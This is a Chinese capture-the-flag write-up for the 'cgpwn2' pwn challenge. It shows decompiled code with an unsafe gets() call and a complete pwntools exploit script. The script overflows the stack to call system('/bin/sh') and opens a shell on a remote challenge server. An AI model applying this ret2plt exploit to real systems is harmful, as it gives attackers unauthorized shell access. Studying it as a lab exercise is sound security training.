PWN攻防世界cgpwn2

首先，查看文件的相关内容。

丢入IDA中查看代码。
main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  hello();
  puts("thank you");
  return 0;
}

hello函数

char *hello()
{
    
  __int16 *p_s; // eax
  char v1; // bl
  unsigned int v2; // ecx
  __int16 *v3; // eax
  __int16 s; // [esp+12h] [ebp-26h] BYREF
  int v6; // [esp+14h] [ebp-24h] BYREF

  p_s = &s;
  v1 = 30;
  if ( ((unsigned __int8)&s & 2) != 0 )
  {
    
    s = 0;
    p_s = (__int16 *)&v6;
    v1 = 28;
  }
  v2 = 0;
  do
  {
    
    *(_DWORD *)&p_s[v2 / 2] = 0;
    v2 += 4;
  }
  while ( v2 < (v1 & 0x1Cu) );
  v3 = &p_s[v2 / 2];
  if ( (v1 & 2) != 0 )
    *v3 = 0;
  puts("please tell me your name");
  fgets(name, 50, stdin);
  puts("hello,you can leave some message here:");
  return gets((char *)&s);
}

我们可以在name中留下字符串“/bin/sh”，然后再进行栈溢出，获取shell。


编写exp：

from pwn import *

context(os='Linux',arch="x86",log_level="debug")
bin_sh_addr = 0x0804A080

elf = ELF('cgpwn2')
system_addr = elf.plt["system"]
content = 0 

def main():
	global day3
	if content == 1:
		day3 = process("cgpwn2")
	else:
		day3 =remote("111.200.241.244",64520)
		
	payload = b'a' * (0x26 + 4) + p32(system_addr) + b'aaaa'
	payload = payload + p32(bin_sh_addr)
	
	day3.recvuntil("please tell me your name\n")
	day3.sendline("/bin/sh")
	day3.recvuntil("hello,you can leave some message here:\n")
	day3.sendline(payload)
	day3.interactive()
	
main()

最后得到Flag。